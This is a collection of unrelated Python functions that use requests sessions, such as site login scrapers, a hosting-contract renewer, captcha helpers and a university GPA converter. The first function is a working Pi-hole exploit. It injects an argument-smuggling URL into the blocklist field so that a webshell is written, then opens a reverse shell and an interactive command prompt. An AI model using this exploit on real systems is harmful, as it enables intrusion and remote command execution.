def exploit(session: requests.session) -> None: print( f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}" ) # Get csrf token #print("[*] Getting CSRF-token") html = session.get(url=f"{url}settings.php?tab=blocklists", proxies=proxy).text soup = BeautifulSoup(html, 'html.parser') token = soup.find("input", {'name': 'token'})['value'] # Stage 1: Trigger connection to our server payload = f'http://{get_ip()}# -o ex.php -d "' data = { 'newuserlists': payload, 'token': token, 'field': 'adlists', 'submit': 'saveupdate' } session.post(url=f"{url}settings.php?tab=blocklists", data=data, proxies=proxy) # Setup http server http = Process(target=setup_http) http.daemon = True http.start() # Trigger access & file write for i in range(2): session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php", proxies=proxy) # Verify webshell if verify_webshell(): print("[+] Webshell uploaded successfully!") rev_shell() try: while True: cmd = input("cmd> ") print(exec(cmd)) except KeyboardInterrupt: quit() except Exception as ex: raise ex else: raise Exception("Webshell not uploaded!")
def check_captcha(s: requests.session, captcha: str): r = s.post("https://pass.changyan.com/api/checkCaptcha", data={ "t": "normal", "c": captcha }) return r.json().get("ok")
def _connect(url: str, data: str=None, headers: dict or None=None, auth=None, session: requests.session=__SESSION) -> requests.Response: """ :param url: url :type url: :class:`str` :param data: data to post :type data: :class:`str` :param headers: headers to send :type headers: :class:`dict` or :class:`None` :param auth: the authenticate for the session. :type auth: :class:`requests.auth.HTTPBasicAuth` :param session: the session to connect to, otherwise using the default ones. :type session: :class:`requests.Session` :return: the respond of the connection :rtype: :class:`requests.Response` """ if headers is None: headers = dict() url = url_fixer(url) headers['User-Agent'] = consts.USER_AGENT if data is not None: sock = session.post(url, data=data, headers=headers, auth=auth) else: sock = session.get(url, headers=headers, auth=auth) return sock
def execute_http_call(method, url, params, retry, timeout, apiKey, apiKeyPrefix): """ Executes http call using requests library Parameters ---------- method : str url : str params : dict retry : Retry timeout : tuple Returns ------- Response """ # set session session = Session() session.mount('https://', HTTPAdapter(max_retries=retry)) # Documented in HTTPAdapter session.headers = { 'Authorization': '{} {}'.format(apiKeyPrefix, apiKey), 'Content-Type': 'application/json', 'User-Agent': generate_user_agent(), } if method is "GET": response = session.get(url, params=params, timeout=timeout) elif method is "POST": response = session.post(url, json=params, timeout=timeout) else: raise NotImplementedError() return response
def apost(asession: session, url, data={}): burp0_url = buildURL(asession, url, {}) burp0_cookies = {"ATERNOS_SEC_7bawidcle0t00000": "3uayvfdrudm00000"} for cookie in asession.cookies.get_dict(): if "_SEC_" in cookie: burp0_cookies = { cookie: asession.cookies.get(cookie), } burp0_headers = { "Connection": "close", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://aternos.org", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://aternos.org/go/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" } # burp0_data = { # "user": "******", # "password": "******" # } return asession.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=data)
def scap(r: requests.session, image): try: re = r.post("https://bili.dev:2233/captcha", json={'image': base64.b64encode(image).decode("utf-8")}) re = re.json() except: return None return re['message'] if re and re["code"] == 0 else None
def post_sysconf(s: requests.session, page: str, act: str, params, data): return s.post(url=sysconf, params=dict({ "page": page, "action": act }, **params), data=data, verify=False)
def renew(sess_id: str, session: requests.session, password: str, order_id: str) -> bool: url = "https://support.euserv.com/index.iphp" headers = { "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/83.0.4103.116 Safari/537.36", "Host": "support.euserv.com", "origin": "https://support.euserv.com", "Referer": "https://support.euserv.com/index.iphp" } data = { "Submit": "Extend contract", "sess_id": sess_id, "ord_no": order_id, "subaction": "choose_order", "choose_order_subaction": "show_contract_details" } session.post(url, headers=headers, data=data) data = { "sess_id": sess_id, "subaction": "kc2_security_password_get_token", "prefix": "kc2_customer_contract_details_extend_contract_", "password": password } f = session.post(url, headers=headers, data=data) f.raise_for_status() if not json.loads(f.text)["rs"] == "success": return False token = json.loads(f.text)["token"]["value"] data = { "sess_id": sess_id, "ord_id": order_id, "subaction": "kc2_customer_contract_details_extend_contract_term", "token": token } session.post(url, headers=headers, data=data) time.sleep(5) return True
def dolike(ses: requests.session, to_userid: str, type: int = 1): data = json.dumps({"from": "1", "toUserId": to_userid, "type": str(type)}) sign = get_md5_code(data) res = ses.post(host + '/api/center/doLike', data={ 'sign': sign, 'data': data }) if res.json()['code'] != 200: print(res.text) raise Exception
def login(session: requests.session, account: str, password: str, captcha_code=None, save_captcha=False): """Login to Mo Online. Arguments: session {requests.session} -- requests session. account {str} -- game account. password {str} -- game password. captcha {str} -- captcha code. Raises: LoginError: description: error_type server_error: Server timeout or error account_error: User password or account error captcha_error: captcha code error. Returns: [str] -- game login url. (moop) """ page = session.get(url=LOGIN_URL, timeout=TIMEOUT) if not isinstance(captcha_code, str): get_captcha(session) captcha_code = input("input captcha code: ") csrf_parse(page.text) login_data = { 'loginAccount': account, 'loginPassword': password, 'loginCode': captcha_code, 'contract1': 'on', 'contract2': 'on', 'contract3': 'on', **csrf_parse(page.text) } post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data) if post_login.url == START_GAME_URL and post_login.status_code == 200: _base_index = post_login.text.find('window.location.href') + 24 return post_login.text[_base_index:post_login.text. find('"', _base_index + 1)] elif post_login.textfind("密碼錯誤") > -1: raise LoginError(error_type='account_error', account=account, message="account or password wrong.") elif post_login.textfind("驗證碼輸入不正確") > -1: raise LoginError(error_type='captcha_error', account=account, message="captcha code error.") raise BaseException("Something error :(")
def renew( sess_id: str, session: requests.session, password: str, order_id: str ) -> bool: url = "https://support.euserv.com/index.iphp" headers = { "user-agent": user_agent, "Host": "support.euserv.com", "origin": "https://support.euserv.com", "Referer": "https://support.euserv.com/index.iphp", } data = { "Submit": "Extend contract", "sess_id": sess_id, "ord_no": order_id, "subaction": "choose_order", "choose_order_subaction": "show_contract_details", } session.post(url, headers=headers, data=data) data = { "sess_id": sess_id, "subaction": "kc2_security_password_get_token", "prefix": "kc2_customer_contract_details_extend_contract_", "password": password, } f = session.post(url, headers=headers, data=data) f.raise_for_status() if not json.loads(f.text)["rs"] == "success": return False token = json.loads(f.text)["token"]["value"] data = { "sess_id": sess_id, "ord_id": order_id, "subaction": "kc2_customer_contract_details_extend_contract_term", "token": token, } session.post(url, headers=headers, data=data) time.sleep(5) return True
def try_post_url(cls, session: requests.session, url: str, *, try_times: int = 3, try_timeout: int = 5, **kwargs) -> Optional[requests.Response]: for _ in range(try_times): try: r = session.post(url=url, timeout=try_timeout, **kwargs) return r except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e: pass return None
def getCourseInfo(cid, tid, sess: requests.session): # query course info by cid and tid params = { "PageIndex": 1, "PageSize": 1, "FunctionString": "Query", "CID": cid, "CourseName": "", "IsNotFull": "False", "CourseType": "B", "TeachNo": tid, "TeachName": "", "Enrolls": "", "Capacity1": "", "Capacity2": "", "CampusId": "", "CollegeId": "", "Credit": "", "TimeText": "" } r = sess.post(_baseurl + _querycourse, params) if "未查询到符合条件的数据!" in r.text: raise RuntimeError(3, f"Course Not Exist") html = lxml.etree.HTML(r.text) td = html.xpath("//table[@class='tbllist']/tr/td") try: return Courseinfo(courseid=td[0].text.strip(), coursename=td[1].text.strip(), teacherid=td[3].text.strip(), teachername=td[4].xpath("./span/text()")[0], capacity=int(td[8].text.strip()), number=int(td[9].text.strip()), restriction=td[11].text.strip() if td[11].text else "") except: emsg = r.status_code if r.url.startswith(_baseurl+_baseerror): emsg = urllib.parse.unquote(r.url.replace(_baseurl+_baseerror+"?msg=","")) logging.warning('Error Occurred: %s' % emsg) logging.debug(r.text) time.sleep(0.5) return Courseinfo(courseid=cid, coursename="XXX", teacherid=tid, teachername="XXX", capacity=0, number=0, restriction="Error Occurred: %s Retry..." % emsg)
def get_ip(session: requests.session, domain: str): payload = {"host": domain} try: res = session.post(IPADDRESS_URL, headers=HEADERS, data=payload, timeout=5) html = res.text begin = html.find("<main>") end = html.find("</main>") if begin == -1 or end == -1: raise Exception("ip address is empty!") html = html[begin:end] pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" ip_list = re.findall(pattern, html) if len(ip_list) != 0: return list(set(ip_list)) raise Exception("ip address is empty!") except Exception as ex: print("get: {}, error: {}".format(domain, ex)) raise
class GPAConverter(): """Scraper of UFSC's Undergraduate academic control system (CAGR) to convert academic record from Decimal to GPA grading scale""" _LOGIN_URL = 'https://sistemas.ufsc.br/login?service=https%3A%2F%2Fcagr.sistemas.ufsc.br%2Fj_spring_cas_security_check&userType=padrao&convertToUserType=alunoGraduacao&lockUserType=1' _WALL_URL = 'https://collecta.sistemas.ufsc.br/restrito/confirmacaoFrame.xhtml' _RECORD_URL = 'https://cagr.sistemas.ufsc.br/modules/aluno/historicoEscolar/' # 1: http://calculadora.abroaders.com.br/ # 2: http://www.centralia.edu/academics/earthscience/resources/dec_grd_sys.htm # 3: https://blog.prepscholar.com/gpa-chart-conversion-to-4-0-scale scale = { 1: [{ 'decimal': 9, 'grade': 4.0 }, { 'decimal': 7, 'grade': 3.0 }, { 'decimal': 5, 'grade': 2 }, { 'decimal': 3, 'grade': 1 }, { 'decimal': 0, 'grade': 0 }], 2: [{ 'decimal': 9.7, 'grade': 4.0 }, { 'decimal': 9.6, 'grade': 3.9 }, { 'decimal': 9.5, 'grade': 3.8 }, { 'decimal': 9.3, 'grade': 3.7 }, { 'decimal': 9.1, 'grade': 3.6 }, { 'decimal': 9.0, 'grade': 3.5 }, { 'decimal': 8.8, 'grade': 3.4 }, { 'decimal': 8.7, 'grade': 3.3 }, { 'decimal': 8.5, 'grade': 3.2 }, { 'decimal': 8.4, 'grade': 3.1 }, { 'decimal': 8.2, 'grade': 3.0 }, { 'decimal': 8.0, 'grade': 2.9 }, { 'decimal': 7.9, 'grade': 2.8 }, { 'decimal': 7.8, 'grade': 2.7 }, { 'decimal': 7.7, 'grade': 2.6 }, { 'decimal': 7.6, 'grade': 2.5 }, { 'decimal': 7.5, 'grade': 2.4 }, { 'decimal': 7.4, 'grade': 2.3 }, { 'decimal': 7.3, 'grade': 2.2 }, { 'decimal': 7.2, 'grade': 2.1 }, { 'decimal': 7.1, 'grade': 2.0 }, { 'decimal': 7.0, 'grade': 1.9 }, { 'decimal': 6.9, 'grade': 1.8 }, { 'decimal': 6.8, 'grade': 1.7 }, { 'decimal': 6.7, 'grade': 1.6 }, { 'decimal': 6.6, 'grade': 1.5 }, { 'decimal': 6.5, 'grade': 1.4 }, { 'decimal': 6.4, 'grade': 1.3 }, { 'decimal': 6.2, 'grade': 1.2 }, { 'decimal': 6.1, 'grade': 1.1 }, { 'decimal': 6.0, 'grade': 1.0 }, { 'decimal': 0, 'grade': 0 }], 3: [{ 'decimal': 9.3, 'grade': 4.0 }, { 'decimal': 9.0, 'grade': 3.7 }, { 'decimal': 8.7, 'grade': 3.3 }, { 'decimal': 8.3, 'grade': 3.0 }, { 'decimal': 8.0, 'grade': 2.7 }, { 'decimal': 7.7, 'grade': 2.3 }, { 'decimal': 7.3, 'grade': 2.0 }, { 'decimal': 7.0, 'grade': 1.7 }, { 'decimal': 6.7, 'grade': 1.3 }, { 'decimal': 6.5, 'grade': 1.0 }, { 'decimal': 0, 'grade': 0.0 }] } def __init__(self, username=None, password=None): self.__session = Session() # generate csrf token to include in the log-in payload self.__token = (BeautifulSoup( self.__session.get(GPAConverter._LOGIN_URL).content, 'lxml').find(attrs={ "name": "execution", "type": "hidden" })['value']) if not username or not password: self.login() else: self.__login(username, password) self.__bypass_wall() @classmethod def from_dotenv(cls): """Log-in using a .env file. The .env file must contain the variables USERNAME and PASSWORD Returns: instance (GPAConverter): a GPAConverter instance logged-in""" username = get_key(find_dotenv(), 'USERNAME') password = get_key(find_dotenv(), 'PASSWORD') instance = cls(username, password) return instance def login(self): """Log-in providing the credentials on the CLI""" # collect username via CLI username = input('Username: '******'Password: '******'username': username, 'password': password, 'admin': 0, 'execution': self.__token, '_eventId': 'submit' } response = self.__session.post(GPAConverter._LOGIN_URL, data=payload) # if HTTP 401 (Unauthorized - Wrong username or password) raise LoginError if response.status_code == 401: raise LoginError('Invalid username or password') def __bypass_wall(self): # generate standard payload to bypass a survey wall payload = { 'j_id20': 'j_id20', 'j_id20:j_id21': 'Clique aqui para voltar para o CAGR', 'javax.faces.ViewState': 'j_id1' } self.__session.post(GPAConverter._WALL_URL, data=payload) def get_grade_records(self): """Scrape and return the transcript of records Returns: transcript (DataFrame): tabular data containing the subject code, description, credit points and grade """ # transform the html content in a soup soup = BeautifulSoup( self.__session.get(GPAConverter._RECORD_URL).content, 'lxml') # find all Attributes in the table subjects_obj = soup.find_all('tr', attrs={'class': 'rich-table-row'}) # subjects is used to store the subjects and all of its information subjects = list() for i in subjects_obj: subject = list(i) try: # divide credit points by the standard number of weeks in the academic calendar credits = int(subject[2].contents[0]) / 18 grade = float(subject[3].contents[0]) except IndexError: # if a subject doesn't contain credit points, do not include it into the list warnings.warn('Empty credit points subject', Warning) continue except ValueError: # if a subject do not contain a numeric grade, do not include it into the list warnings.warn('Concept I subject', Warning) continue subjects.append({ 'code': subject[0].contents[0], 'subject': subject[1].contents[0], 'credits': credits, 'grade': grade, }) # transform list of subejects in a DataFrame self.transcript = pd.DataFrame(subjects) return self.transcript @staticmethod def _gpa(grade, conversion): return max(conversion.loc[conversion.decimal <= grade, 'grade']) def get_iaa(self, transcript=None): """Calculates the grades' cumulative decimal average Attributes: transcript (DataFrame): tabular data cointaining the subjects, credit points and grades. If not provided, it will be scrapped out of CAGR """ if transcript is None: try: transcript = self.transcript.copy() except AttributeError: warnings.warn('get_grade_records was not previously executed', Warning) self.get_grade_records() transcript = self.transcript print('IAA: %.2f' % (sum(transcript.credits * transcript.grade) / sum(transcript.credits))) def get_gpa(self, scale_id=1, transcript=None): """Calculates the GPA Attributes: scale_id (int): from 1 - 3, specifies the GPA scale used 1: http://calculadora.abroaders.com.br/ 2: http://www.centralia.edu/academics/earthscience/resources/dec_grd_sys.htm 3: https://blog.prepscholar.com/gpa-chart-conversion-to-4-0-scale transcript (DataFrame): tabular data cointaining the subjects, credit points and grades. If not provided, it will be scrapped out of CAGR """ # creates a DataFrame of the selected scale conversion = pd.DataFrame(GPAConverter.scale[scale_id]) # if a transcript is not provided, the one fetched by the module is used if transcript is None: try: transcript = self.transcript.copy() except AttributeError: warnings.warn('get_grade_records was not previously executed', Warning) self.get_grade_records() transcript = self.transcript print('GPA: %.2f' % (sum(transcript.credits * transcript.loc[:, 'grade'].apply( self._gpa, args=(conversion, ))) / sum(transcript.credits))) def export_translated_transcript(self, scale_id=1): """Exports the transcript of records with GPA conversion and subject translation to a Excel Spreadsheet Attributes: scale_id (int): from 1 - 3, specifies the GPA scale used 1: http://calculadora.abroaders.com.br/ 2: http://www.centralia.edu/academics/earthscience/resources/dec_grd_sys.htm 3: https://blog.prepscholar.com/gpa-chart-conversion-to-4-0-scale """ # creates a DataFrame of the selected scale conversion = pd.DataFrame(GPAConverter.scale[scale_id]) # read translated transcript translated = pd.read_excel('./translated.xls', header=None, names=['code', 'subjects']) transcript = self.transcript.copy() # generate GPA and translated description columns transcript['translated'] = [ translated.loc[translated.code == i, 'subjects'].iloc[0] if i in list(translated.code) else '' for i in transcript.code ] transcript['gpa'] = transcript.loc[:, 'grade'].apply(self._gpa, args=(conversion, )) transcript = transcript.loc[:, [ 'code', 'credits', 'grade', 'gpa', 'subject', 'translated' ]] # export file to excel and print its path transcript.to_excel('./exported_translated_transcript.xlsx') print('file saved as ./exported_translated_transcript.xlsx')